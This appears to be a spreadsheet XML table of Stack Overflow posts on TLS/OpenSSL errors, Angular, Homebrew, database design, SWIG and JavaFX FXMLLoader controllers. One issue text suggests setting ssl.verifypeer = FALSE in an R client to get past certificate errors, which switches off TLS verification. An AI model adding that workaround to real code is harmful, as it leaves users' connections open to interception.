This of course means that the client won't know whether the server has accepted the certificate or not until it next reads data from the server. If it has been rejected then the next thing the client will read will be a failure alert (otherwise it will be normal application data).
I'm aware that the handshake protocol got completely re-written as part of TLS 1.3 however it seems like with all of the various callbacks available I should be able somehow on the client side to determine that authentication has failed without having to attempt to write data to the server.
It's not writing data to the server that is important - it is
reading
data. Only then will you know whether the server has sent an alert or just normal application data. Until that data has been read there are no callbacks available in OpenSSL that will tell you this - because OpenSSL itself does not know due to the underlying protocol.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just learning Angular, so my apologies if I've missed something obvious.&lt;/p&gt;
&lt;p&gt;I have a simple login component which I'm using in my main page. Here's the login.component.html:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@if (isLoggedIn) {
  &amp;lt;div&amp;gt;{{ loginName }}&amp;lt;/div&amp;gt;
}
@else {
  &amp;lt;div (click)=&amp;quot;signInWithGoogle()&amp;quot;&amp;gt;Log In&amp;lt;/div&amp;gt;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the login.component.ts:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { Component, inject, ProviderToken } from '@angular/core';
import { AuthGoogleService } from '../services/auth-google.service';
@Component({
  selector: 'app-login',
  templateUrl: './login.component.html',
  styleUrl: './login.component.css',
  standalone: true,
  providers: [AuthGoogleService],
})
export class LoginComponent {
  private authService: AuthGoogleService;
  isLoggedIn: boolean = false;
  loginName: string = '';
  signInWithGoogle() {
    this.authService.login();
  }
  constructor() {
    this.authService = inject(AuthGoogleService);
    this.isLoggedIn = false;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've included the inject in the constructor exactly as the documentation suggests. I've also tried setting it in the declaration with the same results. In all cases I get the error stated in the question title. If I remove my component from the app.component.html then everything runs fine, so I'm pretty sure that the problem is with this component.&lt;/p&gt;
&lt;p&gt;Is there a way to debug the actual cause for this? Other things that I should be looking at? I'm currently using Angular 19.x.&lt;/p&gt;
&lt;p&gt;EDIT:
The AuthGoogleService class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { Injectable, inject, signal } from '@angular/core';
import { Router } from '@angular/router';
import { AuthConfig, OAuthService } from 'angular-oauth2-oidc';
import { authConfig } from './auth.config';
@Injectable({
  providedIn: 'root',
})
export class AuthGoogleService {
  private oAuthService = inject(OAuthService);
  private router = inject(Router);
  profile = signal&amp;lt;any&amp;gt;(null);
  constructor() {
    this.initConfiguration();
  }
  initConfiguration() {
    this.oAuthService.configure(authConfig);
    this.oAuthService.setupAutomaticSilentRefresh();
    this.oAuthService.loadDiscoveryDocumentAndTryLogin().then(() =&amp;gt; {
      if (this.oAuthService.hasValidIdToken()) {
        this.profile.set(this.oAuthService.getIdentityClaims());
      }
    });
  }
  login() {
    this.oAuthService.initImplicitFlow();
  }
  logout() {
    this.oAuthService.revokeTokenAndLogout();
    this.oAuthService.logOut();
    this.profile.set(null);
  }
  getProfile() {
    return this.profile();
  }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C588</t>
  </si>
  <si>
    <t>Fix brew not linking SSL
For details see http://stackoverflow.com/questions/38670295/brew-refusing-to-link-openssl</t>
  </si>
  <si>
    <t>As the update to the other answer suggests, the workaround of installing the old openssl101 brew will no longer work.  For a right-now workaround, see
this comment on dotnet/cli#3964
.
The most relevant part of the issue copied here:
I looked into the other option that was suggested for setting the rpath on the library. I think the following is a better solution that will only effect this specific library.
sudo install_name_tool -add_rpath /usr/local/opt/openssl/lib /usr/local/share/dotnet/shared/Microsoft.NETCore.App/1.0.0/System.Security.Cryptography.Native.dylib
and/or if you have NETCore 1.0.1 installed perform the same command for 1.0.1 as well:
sudo install_name_tool -add_rpath /usr/local/opt/openssl/lib /usr/local/share/dotnet/shared/Microsoft.NETCore.App/1.0.1/System.Security.Cryptography.Native.dylib
In effect, rather than telling the operating system to always use the homebrew version of SSL and potentially causing something to break, we're telling dotnet how to find the correct library.
Also importantly, it looks like Microsoft are aware of the issue and and have both a) a somewhat immediate plan to mitigate as well as b) a long-term solution (probaby bundling OpenSSL with dotnet).
Another thing to note:
/usr/local/opt/openssl/lib
is where the brew is linked by default:
13:22 $ ls -l /usr/local/opt/openssl
lrwxr-xr-x  1 ben  admin  26 May 15 14:22 /usr/local/opt/openssl -&gt; ../Cellar/openssl/1.0.2h_1
If for whatever reason you install the brew and link it in a different location, then that path is the one you should use as an rpath.
Once you've update the rpath of the System.Security.Cryptography.Native.dylib libray, you'll need to restart your interactive session (i.e., close your console and start another one).</t>
  </si>
  <si>
    <t xml:space="preserve">I'm designing a web driven SQL database application from ground up.  The application will manage information for clients that are in the same type of industry.  In other words, the information (entities and relations among them) regarding each client does not vary too much from one to the next.  However, the volume of the information is dictated by the size of the company.  The application could be hosted on our server(s) or anywhere a client chooses. 
My first question is: what are the pros and cons given the following options:
A. Manage multiple clients
information in the same database; 
B. Manage one client information per
database; so each client will have
its own database;
My second question is: what are the pros and cons given the following methods of deployment?
A. Each client gets its own server (node);
B. Use large RAID drive(s) with one powerful server with multiple websites;
As decisions to these choices affect my design, I would like to know the pros and cons from different perspectives including maintenance, cost(financially and in time) and architecture to name a few.
Technologies used:
Database: MS SQL
Platform: ASP.NET
Language: C#
Any comments or suggestions are most welcome,
Thanks,
Cullen
</t>
  </si>
  <si>
    <t>C589</t>
  </si>
  <si>
    <t>SSL connection Error modification for getURLContent
I would like to suggest modifying the .opts argument to avoid SSL connection issues (I could not read from the API at work). Please find deeper explanation on this solution at http://stackoverflow.com/questions/17411313/ssl-verification-causes-rcurl-and-httr-to-break-on-a-website-that-should-be-le
.opts = list(ssl.verifypeer = FALSE, followlocation=TRUE)</t>
  </si>
  <si>
    <t>##TL;DR: Get the TERENA SSL CA PEM file from TERENA's repository of trusted certificates and use this file as your cainfo parameter.
EDIT: You might need to add two lines to the beginning of that file. The code works for me using the following TERENA.pem file:
TERENA
======
-----BEGIN CERTIFICATE-----
MIIEmDCCA4CgAwIBAgIQS8gUAy8H+mqk8Nop32F5ujANBgkqhkiG9w0BAQUFADCB
lzELMAkGA1UEBhMCVVMxCzAJBgNVBAgTAlVUMRcwFQYDVQQHEw5TYWx0IExha2Ug
Q2l0eTEeMBwGA1UEChMVVGhlIFVTRVJUUlVTVCBOZXR3b3JrMSEwHwYDVQQLExho
dHRwOi8vd3d3LnVzZXJ0cnVzdC5jb20xHzAdBgNVBAMTFlVUTi1VU0VSRmlyc3Qt
SGFyZHdhcmUwHhcNMDkwNTE4MDAwMDAwWhcNMjAwNTMwMTA0ODM4WjA2MQswCQYD
VQQGEwJOTDEPMA0GA1UEChMGVEVSRU5BMRYwFAYDVQQDEw1URVJFTkEgU1NMIENB
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw+NIxC9cwcupmf0booNd
ij2tOtDipEMfTQ7+NSUwpWkbxOjlwY9UfuFqoppcXN49/ALOlrhfj4NbzGBAkPjk
tjolnF8UUeyx56+eUKExVccCvaxSin81joL6hK0V/qJ/gxA6VVOULAEWdJRUYyij
8lspPZSIgCDiFFkhGbSkmOFg5vLrooCDQ+CtaPN5GYtoQ1E/iptBhQw1jF218bbl
p8ODtWsjb9Sl61DllPFKX+4nSxQSFSRMDc9ijbcAIa06Mg9YC18em9HfnY6pGTVQ
L0GprTvG4EWyUzl/Ib8iGodcNK5Sbwd9ogtOnyt5pn0T3fV/g3wvWl13eHiRoBS/
fQIDAQABo4IBPjCCATowHwYDVR0jBBgwFoAUoXJfJhsomEOVXQc31YWWnUvSw0Uw
HQYDVR0OBBYEFAy9k2gM896ro0lrKzdXR+qQ47ntMA4GA1UdDwEB/wQEAwIBBjAS
BgNVHRMBAf8ECDAGAQH/AgEAMBgGA1UdIAQRMA8wDQYLKwYBBAGyMQECAh0wRAYD
VR0fBD0wOzA5oDegNYYzaHR0cDovL2NybC51c2VydHJ1c3QuY29tL1VUTi1VU0VS
Rmlyc3QtSGFyZHdhcmUuY3JsMHQGCCsGAQUFBwEBBGgwZjA9BggrBgEFBQcwAoYx
aHR0cDovL2NydC51c2VydHJ1c3QuY29tL1VUTkFkZFRydXN0U2VydmVyX0NBLmNy
dDAlBggrBgEFBQcwAYYZaHR0cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkqhkiG
9w0BAQUFAAOCAQEATiPuSJz2hYtxxApuc5NywDqOgIrZs8qy1AGcKM/yXA4hRJML
thoh45gBlA5nSYEevj0NTmDa76AxTpXv8916WoIgQ7ahY0OzUGlDYktWYrA0irkT
Q1mT7BR5iPNIk+idyfqHcgxrVqDDFY1opYcfcS3mWm08aXFABFXcoEOUIEU4eNe9
itg5xt8Jt1qaqQO4KBB4zb8BG1oRPjj02Bs0ec8z0gH9rJjNbUcRkEy7uVvYcOfV
r7bMxIbmdcCeKbYrDyqlaQIN4+mitF3A884saoU4dmHGSYKrUbOCprlBmCiY+2v+
ihb/MX5UR6g83EMmqZsFt57ANEORMNQywxFa4Q==
-----END CERTIFICATE-----
##Why?
The GET method of httr uses RCurl::curlPerform internally, as does RCurl::getURL, so the observed behavior is not surprising. The curl command-line tools with the "verbose" switch -v gives the following additional hints:
$ curl -v  "https://www.esds.ac.uk/secure/UKDSRegister_start.asp"
* About to connect() to www.esds.ac.uk port 443 (#0)
*   Trying 155.245.69.4...
* Connected to www.esds.ac.uk (155.245.69.4) port 443 (#0)
* successfully set certificate verify locations:
*   CAfile: none
	CApath: /etc/ssl/certs
* SSLv3, TLS handshake, Client hello (1):
* SSLv3, TLS handshake, Server hello (2):
* SSLv3, TLS handshake, CERT (11):
* SSLv3, TLS alert, Server hello (2):
* SSL certificate problem: unable to get local issuer certificate
* Closing connection 0
curl: (60) SSL certificate problem: unable to get local issuer certificate
More details here: http://curl.haxx.se/docs/sslcerts.html
curl performs SSL certificate verification by default, using a "bundle"
 of Certificate Authority (CA) public keys (CA certs). If the default
 bundle file isn't adequate, you can specify an alternate file
 using the --cacert option.
If this HTTPS server uses a certificate signed by a CA represented in
 the bundle, the certificate verification probably failed due to a
 problem with the certificate (it might be expired, or the name might
 not match the domain name in the URL).
If you'd like to turn off curl's verification of the certificate, use
 the -k (or --insecure) option.
The link in the above error message contains, at enumeration item 3, instruction on obtaining the server's certificate:
$ openssl s_client -connect "www.esds.ac.uk:443"
CONNECTED(00000003)
depth=0 C = GB, ST = Essex, L = Colchester, O = University of Essex, OU = UK Data Archive, CN = www.esds.ac.uk
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = GB, ST = Essex, L = Colchester, O = University of Essex, OU = UK Data Archive, CN = www.esds.ac.uk
verify error:num=27:certificate not trusted
verify return:1
depth=0 C = GB, ST = Essex, L = Colchester, O = University of Essex, OU = UK Data Archive, CN = www.esds.ac.uk
verify error:num=21:unable to verify the first certificate
verify return:1
---
Certificate chain
 0 s:/C=GB/ST=Essex/L=Colchester/O=University of Essex/OU=UK Data Archive/CN=www.esds.ac.uk
	 i:/C=NL/O=TERENA/CN=TERENA SSL CA
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIEIzCCAwugAwIBAgIQO9FPWbAYKDAuFHq61U3gDDANBgkqhkiG9w0BAQUFADA2
MQswCQYDVQQGEwJOTDEPMA0GA1UEChMGVEVSRU5BMRYwFAYDVQQDEw1URVJFTkEg
U1NMIENBMB4XDTEwMTIwNjAwMDAwMFoXDTEzMTIwNTIzNTk1OVowgYMxCzAJBgNV
......
To me, this reads as if the certificate is not trusted. A quick search for "terena ssl root certificate" found this website of the University of Helsinki which reads:
Unfortunately root certificates of these authorities are not always present in devices in use, instead, we need to install those root certificates ourselves.
This site also contains a link to the certificate repository.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;so I did a sudo yum install swig on a redhat 9 linux VM and it installed swig 4.0.2 from a src.rpm
my $JAVA_HOME is /usr/java/jdk-17
in case it matters I'm using devtools-12 for C++&lt;/p&gt;
&lt;p&gt;I'm trying to SWIG&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace MyNamespace
{
    enum Color {
    Red=0,
    Green,
    Blue
    };
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;%module example_i
%{
#include &amp;quot;example.h&amp;quot;
%}
%include &amp;quot;enums.swg&amp;quot;
// Make any 'Swig-Generated' classes public, so other Java packages can import
SWIG_JAVABODY_PROXY(public, public, SWIGTYPE)
SWIG_JAVABODY_TYPEWRAPPER(public, public, public, SWIGTYPE)
namespace MyNamespace
{
    %java enum(Color);
}
%include &amp;quot;example.h&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;via &lt;code&gt;swig -java -c++ example.i&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;and getting the error &amp;quot;Unknown directive `%java`.&amp;quot;&lt;/p&gt;
&lt;p&gt;how do I get around this? I had it working before the %java enum(Color); and the point of adding it is to get a java enum (the real use case has well over 40 enum values with more being added often so I don't want to maintain a duplicate enum definintion in the example.i file)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C59</t>
  </si>
  <si>
    <t>STOPPING POINT... thoughts and links below.
Need to do the same separation thing with the layers. Also, need to
think about how this new style will affect the calculations.
Links 1.........
https://stackoverflow.com/questions/33944571/access-parent-controller-from-child-controller-in-javafx
https://stackoverflow.com/questions/23048500/access-fields-from-another-controller-in-javafx
https://stackoverflow.com/questions/27433041/access-elements-of-loaded-fxml-in-parent-controller
Links 2.........
https://stackoverflow.com/questions/23461148/fxmlloader-getcontroller-returns-null
https://stackoverflow.com/questions/25828561/javafx-how-to-get-fxml-controller
https://stackoverflow.com/questions/10751271/accessing-fxml-controller-class
https://www.google.com/search?q=javafx+get+controller+of+a+view
https://stackoverflow.com/questions/10751271/accessing-fxml-controller-class
https://stackoverflow.com/questions/25828561/javafx-how-to-get-fxml-controller
https://stackoverflow.com/questions/12935953/javafx-class-controller-scene-reference
https://stackoverflow.com/questions/23461148/fxmlloader-getcontroller-returns-null
Links 3.........
https://stackoverflow.com/questions/24850050/javafx-adding-new-tab-with-fxml-on-click
https://stackoverflow.com/questions/26177177/building-seperate-tabs-from-same-fxml-with-java
https://stackoverflow.com/questions/24850050/javafx-adding-new-tab-with-fxml-on-click</t>
  </si>
  <si>
    <t>I currently have the following situation:
I have created a FXML file backed up by a FXML Controller. The screen consists of a sidebar and a child holder. When I click on an element in the sidebar, I load an additional FXML file in the child holder, like this:
    childHolder.getChildren().addAll(FXMLLoader.load(getClass().getResource("SidebarItem1.fxml")));
This works fine. But I want to access some elements of the loaded FXML in the Controller of the Parent Controller. I just initialized the elements of the child FXML after I loaded it.
I already looked at this question: https://stackoverflow.com/questions/17801365/javafx-fxml-access-loaded-fxml-controls-from-parent-controller, but when I do it like that, I still get an error:
    FXMLLoader loader = new FXMLLoader(getClass().getResource("SidebarItem1.fxml"));
    loader.setController(this);
    childHolder.getChildren().addAll(loader.load());
    someChildTextField.setText("Some text");
I have given `someChildTextField` a `fx:id` and I have placed it on top of the initialize like this:
    @FXML public TextField someChildTextField;
Still, I get a NullpointerException, so I assume it can still not find the control.
Does anyone know how to access elements of a loaded FXML in the Parent Controller?
I can't see any reason your approach doesn't work; I mocked something similar up and it worked just fine. This is an unusual approach, though, as you are using the same object as a controller for two separate FXML files.
I would recommend using one controller for each FXML. So you could do something like
public class SidebarItem1Controller {
    @FXML
    private TextField someTextField ;
    public void setText(String text) {
        someTextField.setText(text);
    }
}
and then from your parent controller just do
FXMLLoader loader = new FXMLLoader(getClass().getResource("SidebarItem1.fxml"));
childHolder.getChildren().add(loader.load());
SideBarItem1Controller childController = loader.getController();
childController.setText("Some Text");
Set the controller in your SideBarItem1.fxml file the usual way, with fx:controller = com.example.SidebarItem1Controller"</t>
  </si>
  <si>
    <t>Is this approach lame to do so?
I've tried many approaches e.g.
1. https://stackoverflow.com/questions/6433252/how-can-i-exchange-data-between-forms
2. https://stackoverflow.com/questions/34118025/javafx-pass-values-from-child-to-parent
3. https://stackoverflow.com/questions/15004365/javafx-2-2-fxinclude-how-to-access-parent-controller-from-child-controller
but this seems to be pretty direct and understandable.
    public class ParentController {
        private Settings settings;
        public void setSettings(Settings settings) {
                this.settings = settings;
                System.out.println(this.settings.toString());
        }
        @FXML
        private Button open;
        @FXML
        private void pass() throws IOException {
                Stage st = new Stage();
                FXMLLoader loader = new FXMLLoader(getClass().getResource("Child.fxml"));
                Region root = (Region) loader.load();
                Scene scene = new Scene(root);
                st.setScene(scene);
                ChildController controller = loader.&lt;ChildController&gt;getController();
                controller.initialize(this);
                st.show();
        }
    }
&lt;!----&gt;
    public class ChildController {
        @FXML
        private TextField number; // some settings
        @FXML
        private Button ok;
        private ParentController parentController ;
        @FXML
        public void pass() {
                Stage stage = (Stage) ok.getScene().getWindow();
                parentController.setSettings(setSettings());
                stage.close();
        }
        private Settings setSettings(){
                return new Settings(Integer.valueOf(this.number.getText()));
        }
        public void initialize(ParentController parentController) {
                this.parentController = parentController;
        }
    }
In such the way I'm getting settings object generated in Child controller and pass this object to the parent controller.
This works...
Is this approach appropriate? If not, what pitfall is may imply?</t>
  </si>
  <si>
    <t>Expose properties in the "nested" controllers StreamController and PlayController. Those controllers can bind the properties to the UI components they define as needed.
Then inject the nested controllers into MainController as described in the Nested Controllers section of the Introduction to FXML.
Update: Here's a more similar example, where the interacting controllers are both included in a common FXML.</t>
  </si>
  <si>
    <t xml:space="preserve">I have the following code:
    Parent parent = FXMLLoader.load(Main.class.getResource("JanelaPrincipal.fxml"));
in the fxml file there is a reference to the controller class. How can I get the controller object?
----
fxml:
    &lt;AnchorPane id="AnchorPane" fx:id="root" 
        prefHeight="768.0" prefWidth="1024.0" xmlns:fx="http://javafx.com/fxml/1" 
        xmlns="http://javafx.com/javafx/2.2" 
        fx:controller="br.meuspila.javafx.JanelaPrincipalController"&gt;
        ...
Instantiate an FXMLLoader and use an instance load method rather than a class static load method.  You can then retrieve the controller instance from the loader instance.
FXMLLoader loader = new FXMLLoader(
  getClass().getResource(
    "customerDialog.fxml"
  )
);
Pane pane = (Pane) loader.load();
CustomerDialogController controller = 
    loader.&lt;CustomerDialogController&gt;getController();
controller.initData(customer);
For more info see:
https://stackoverflow.com/questions/14187963/passing-parameters-javafx-fxml
</t>
  </si>
  <si>
    <t>JavaFX class controller scene reference
Is there any way of getting the Scene object of an FXML loaded file from the associated class controller.
I'm doing something like this:
@FXML
private AnchorPane anchor; 
Scene scene = anchor.getScene();
but i'd like a solution that does not reference the AnchorPane control.
Why not? Controller is an abstract class, he's not aware about UI unless you deliberately make him know.
Nodes (inlcuding AnchorPane) are another story, they hardly exists outside for scenegraph. So it's perfectly fine to ask Node about his parent or scene.
If you still want to handle that separately there are next approaches:
you can create a custom controller and set scene after loader. Just note that at the time initialize() called it wouldn't yet initialized.
 public class MyController {
     private void Scene scene;
     public void setScene(Scene scene) { this.scene = scene; }
 }
 // loading code
 FXMLLoader fxmlLoader = new FXMLLoader();
 AnchorPane root = (AnchorPane) fxmlLoader.load(getClass().getResource("MyApp.fxml"));
 MyController myController = (MyController) fxmlLoader.getController();
 myController.setScene(scene);
You can create a custom fxml control which will incorporate controller and he can just call getScene() for itself. See an example here: https://stackoverflow.com/a/10718683/1054140</t>
  </si>
  <si>
    <t>I would like to communicate with a FXML controller class at any time, to update information on the screen from the main application or other stages.
Is this possible? I havent found any way to do it.
Static functions could be a way, but they don't have access to the form's controls.
You can get the controller from the FXMLLoader
FXMLLoader fxmlLoader = new FXMLLoader();
Pane p = fxmlLoader.load(getClass().getResource("foo.fxml").openStream());
FooController fooController = (FooController) fxmlLoader.getController();
store it in your main stage and provide getFooController() getter method.From other classes or stages, every time when you need to refresh the loaded "foo.fxml" page, ask it from its controller:
getFooController().updatePage(strData);
updatePage() can be something like:
// ...
@FXML private Label lblData;
// ...
public void updatePage(String data){
    lblData.setText(data);
}
// ...
in the FooController class.This way other page users do not bother about page's internal structure like what and where Label lblData is.
Also look the https://stackoverflow.com/a/10718683/682495. In JavaFX 2.2 FXMLLoader is improved.</t>
  </si>
  <si>
    <t>I have the main application class that does the following just fine:
       @Override
       public void start(Stage primaryStage) {
          try {
             FXMLLoader loader = new FXMLLoader(getClass().getResource(
                   "RecordScreen.fxml"));
             Parent root = (Parent) loader.load();
             Scene newScene = new Scene(root);
             Stage newStage = new Stage();
             newStage.setScene(newScene);
             newStage.show();
          } catch (Exception e) {
             e.printStackTrace();
          }
       }
It launches a table view that displays people. I select a person, hit the edit button, and try to launch a window that will let me edit them.
       @FXML
       public void editPerson() {
          try {
             FXMLLoader loader = new FXMLLoader(getClass().getResource(
                   "PersonEditor.fxml"));
             PersonEditorCtrl ctrl = loader.getController();
             ctrl.init(table.getSelectionModel().getSelectedItem());
             Parent root = (Parent) loader.load();
             Scene newScene = new Scene(root);
             Stage newStage = new Stage();
             newStage.setScene(newScene);
             newStage.show();
          } catch (Exception e) {
             e.printStackTrace();
          }
       }
The problem is, getController is returning null. I have been following this pattern for the past 2 weeks with no problems whatsoever. What am I doing wrong now? These untraceable bugs are aggravating!!!
Here are my two fxmls:
The screen with tableview:
    &lt;AnchorPane xmlns:fx="http://javafx.com/fxml/1" xmlns="http://javafx.com/javafx/2.2" fx:controller="application.RecordsCtrl"&gt;
      &lt;!-- TODO Add Nodes --&gt;
      &lt;children&gt;
        &lt;VBox id="VBox" alignment="CENTER" spacing="0.0" AnchorPane.bottomAnchor="0.0" AnchorPane.leftAnchor="0.0" AnchorPane.rightAnchor="0.0" AnchorPane.topAnchor="0.0"&gt;
          &lt;children&gt;
            &lt;TableView fx:id="table" prefHeight="-1.0" prefWidth="-1.0"&gt;
              &lt;columns&gt;
                &lt;TableColumn prefWidth="75.0" text="Name" fx:id="nameCol" /&gt;
                &lt;TableColumn prefWidth="75.0" text="Age" fx:id="ageCol" /&gt;
              &lt;/columns&gt;
            &lt;/TableView&gt;
            &lt;Button mnemonicParsing="false" onAction="#editPerson" text="Edit" /&gt;
          &lt;/children&gt;
        &lt;/VBox&gt;
      &lt;/children&gt;
    &lt;/AnchorPane&gt;
The person editor:
    &lt;AnchorPane xmlns:fx="http://javafx.com/fxml/1" xmlns="http://javafx.com/javafx/2.2" fx:controller="application.PersonEditorCtrl"&gt;
      &lt;!-- TODO Add Nodes --&gt;
      &lt;children&gt;
        &lt;VBox layoutX="0.0" layoutY="0.0" prefHeight="-1.0" prefWidth="-1.0"&gt;
          &lt;children&gt;
            &lt;TextField fx:id="nameField" prefWidth="200.0" /&gt;
            &lt;TextField fx:id="ageField" prefWidth="200.0" /&gt;
            &lt;Button mnemonicParsing="false" text="Button" /&gt;
          &lt;/children&gt;
        &lt;/VBox&gt;
      &lt;/children&gt;
    &lt;/AnchorPane&gt;
In your scene builder, you need to make sure that you have explicitly stated the fx:controller attribute.
To do this:
Open your desired FXML file in Scenebuilder.
Click on the controller drop down.
Select the controller class.
If you do not specify the fx:controller it will return null.</t>
  </si>
  <si>
    <t>I have the main application class that does the following just fine:
       @Override
       public void start(Stage primaryStage) {
          try {
             FXMLLoader loader = new FXMLLoader(getClass().getResource(
                   "RecordScreen.fxml"));
             Parent root = (Parent) loader.load();
             Scene newScene = new Scene(root);
             Stage newStage = new Stage();
             newStage.setScene(newScene);
             newStage.show();
          } catch (Exception e) {
             e.printStackTrace();
          }
       }
It launches a table view that displays people. I select a person, hit the edit button, and try to launch a window that will let me edit them.
       @FXML
       public void editPerson() {
          try {
             FXMLLoader loader = new FXMLLoader(getClass().getResource(
                   "PersonEditor.fxml"));
             PersonEditorCtrl ctrl = loader.getController();
             ctrl.init(table.getSelectionModel().getSelectedItem());
             Parent root = (Parent) loader.load();
             Scene newScene = new Scene(root);
             Stage newStage = new Stage();
             newStage.setScene(newScene);
             newStage.show();
          } catch (Exception e) {
             e.printStackTrace();
          }
       }
The problem is, getController is returning null. I have been following this pattern for the past 2 weeks with no problems whatsoever. What am I doing wrong now? These untraceable bugs are aggravating!!!
Here are my two fxmls:
The screen with tableview:
    &lt;AnchorPane xmlns:fx="http://javafx.com/fxml/1" xmlns="http://javafx.com/javafx/2.2" fx:controller="application.RecordsCtrl"&gt;
      &lt;!-- TODO Add Nodes --&gt;
      &lt;children&gt;
        &lt;VBox id="VBox" alignment="CENTER" spacing="0.0" AnchorPane.bottomAnchor="0.0" AnchorPane.leftAnchor="0.0" AnchorPane.rightAnchor="0.0" AnchorPane.topAnchor="0.0"&gt;
          &lt;children&gt;
            &lt;TableView fx:id="table" prefHeight="-1.0" prefWidth="-1.0"&gt;
              &lt;columns&gt;
                &lt;TableColumn prefWidth="75.0" text="Name" fx:id="nameCol" /&gt;
                &lt;TableColumn prefWidth="75.0" text="Age" fx:id="ageCol" /&gt;
              &lt;/columns&gt;
            &lt;/TableView&gt;
            &lt;Button mnemonicParsing="false" onAction="#editPerson" text="Edit" /&gt;
          &lt;/children&gt;
        &lt;/VBox&gt;
      &lt;/children&gt;
    &lt;/AnchorPane&gt;
The person editor:
    &lt;AnchorPane xmlns:fx="http://javafx.com/fxml/1" xmlns="http://javafx.com/javafx/2.2" fx:controller="application.PersonEditorCtrl"&gt;
      &lt;!-- TODO Add Nodes --&gt;
      &lt;children&gt;
        &lt;VBox layoutX="0.0" layoutY="0.0" prefHeight="-1.0" prefWidth="-1.0"&gt;
          &lt;children&gt;
            &lt;TextField fx:id="nameField" prefWidth="200.0" /&gt;
            &lt;TextField fx:id="ageField" prefWidth="200.0" /&gt;
            &lt;Button mnemonicParsing="false" text="Button" /&gt;
          &lt;/children&gt;
        &lt;/VBox&gt;
      &lt;/children&gt;
    &lt;/AnchorPane&gt;
Change this
@FXML
   public void editPerson() {
      try {
         FXMLLoader loader = new FXMLLoader(getClass().getResource(
               "PersonEditor.fxml"));
         PersonEditorCtrl ctrl = loader.getController();
         ctrl.init(table.getSelectionModel().getSelectedItem());
         Parent root = (Parent) loader.load();
         Scene newScene = new Scene(root);
         Stage newStage = new Stage();
         newStage.setScene(newScene);
         newStage.show();
      } catch (Exception e) {
         e.printStackTrace();
      }
   }
To that:
@FXML
   public void editPerson() {
      try {
         FXMLLoader loader = new FXMLLoader(getClass().getResource(
               "PersonEditor.fxml"));
         Parent root = (Parent) loader.load();
         PersonEditorCtrl ctrl = loader.getController();
         ctrl.init(table.getSelectionModel().getSelectedItem());
         Scene newScene = new Scene(root);
         Stage newStage = new Stage();
         newStage.setScene(newScene);
         newStage.show();
      } catch (Exception e) {
         e.printStackTrace();
      }
   }
You first have to run loader.load() then you can get the Controller.
Patrick</t>
  </si>
  <si>
    <t>How can I load the same FXML hierarchy into 2 different roots?
I've tried this:
    protected void openPrivateSession(String remoteNick, int port, boolean isHost) {
    	FXMLLoader loader =
		    new FXMLLoader(getClass().getResource("PrivateTab.fxml"));
    	try {
	        PrivateChat pcc = new PrivateChatController(remoteNick, port, isHost);
	        loader.setController(pcc);
	    if (isHost) {
		    connectRemoteUser(remoteNick, pcc.getPort());
	    }
	    Tab privateChat = new Tab(remoteNick);
	    loader.setRoot(privateChat);
	    loader.load();
	    clientController.addPrivateChatTab(privateChat);
	} catch (IOException e) {
	    e.printStackTrace();
	}
In the client program. this is the client controller:
    public class ClientController implements Initializable {
        private Client associatedClient;
        private String hostname;
        private int port;
        private Stage primaryStage;
        private String title;
        @FXML
        private VBox nickList;
        @FXML
        private TextArea chatArea;
        @FXML
        private TextField msgBar;
        @FXML
        private Button sendButton;
        @FXML
        private MenuItem connectDisconnect;
        @FXML
        private TabPane privateChatPane;
        @FXML
        private MenuItem settingsButton;
        @FXML
        private Stage settings;
        .
        .
        .
}
But that loads the same privateChat tab into the same client (instead of one locally and one remote - that means that `privateChatPane` and probably all the other FXML objects have the same reference).
So I guess my final question is... how can you inject the same FXML into 2 different objects and preserve their uniqueness?
Ok MCVE:
    class classA extends Application{
     public static void main(String[] args){ launch(args); }
     private ClassAController cac;
     public void start(Stage s){
      FXMLLoader loader = new FXMLLoader(getClass().getResource("ClassA.fxml");
      loader.setController(cac = new ClassAController());
      s.setScene(new Scene(loader.load()));
      s.show();
     }
     public void onSomeEvent(String s){
      FXMLLoader loader = new FXMLLoader(getClass().getResource("PrivateChat.fxml");
      loader.setController(new PrivateChatController());
      Tab tab = new Tab(s);
      loader.setRoot(tab);
      cac.addPrivateChatTab(tab);
     }
    }
    class ClassAController implements Initializeable{
    @FXML TabPane privateChatPane;
     public void initialize(URL url, ResourceBundle resource){}
     //Using this method causes the add of the same Tab twice to the same app instead once for each app
     public void addPrivateChatTab(Tab privateChat){
     privateChatPane.getTabs().add(privateChat);
    }
I'm running 2 instances of ClassA app. when I use addPrivateChatTab() I get the same tab twice in the same app instance.
Ok so I solved the problem and this post was helpful. My code changed just a little bit:
protected void addPrivateChatTab(String remoteNick, int port, boolean isHost) {
 FXMLLoader loader =
  new FXMLLoader(getClass().getResource("PrivateTab.fxml"));
 try {
  loader.setController(new PrivateChat(remoteNick, port, isHost));
  if (isHost) {
   associatedClient.connectRemoteUser(remoteNick, PrivateChat.getPort());
  }
  Tab privateChat = new Tab(remoteNick);
  SplitPane sp = loader.load();
  privateChat.setContent(sp);
  addPrivateChatTab(privateChat);
  } catch (IOException e) {
   e.printStackTrace();
}
To be more specific for googlers:
Create the wrapping object (Tab privateChat = new Tab(remoteNick)).
Load the content of the dynamic object you are about to add (SplitPane sp = loader.load()).
Set the content of the wrapping object to the object you loaded (privateChat.setContent(sp))
Finally add the finished object to the stage/parent node (addPrivateChatTab(privateChat))</t>
  </si>
  <si>
    <t>I am trying to add a new tab with fxml
I am trying this code:
    Tab sd=new Tab("Customeradd");
    sd.setContent(Source.sourceFor("","Customeradd.fxml"));
    tabpanel.getTabs().add(sd);
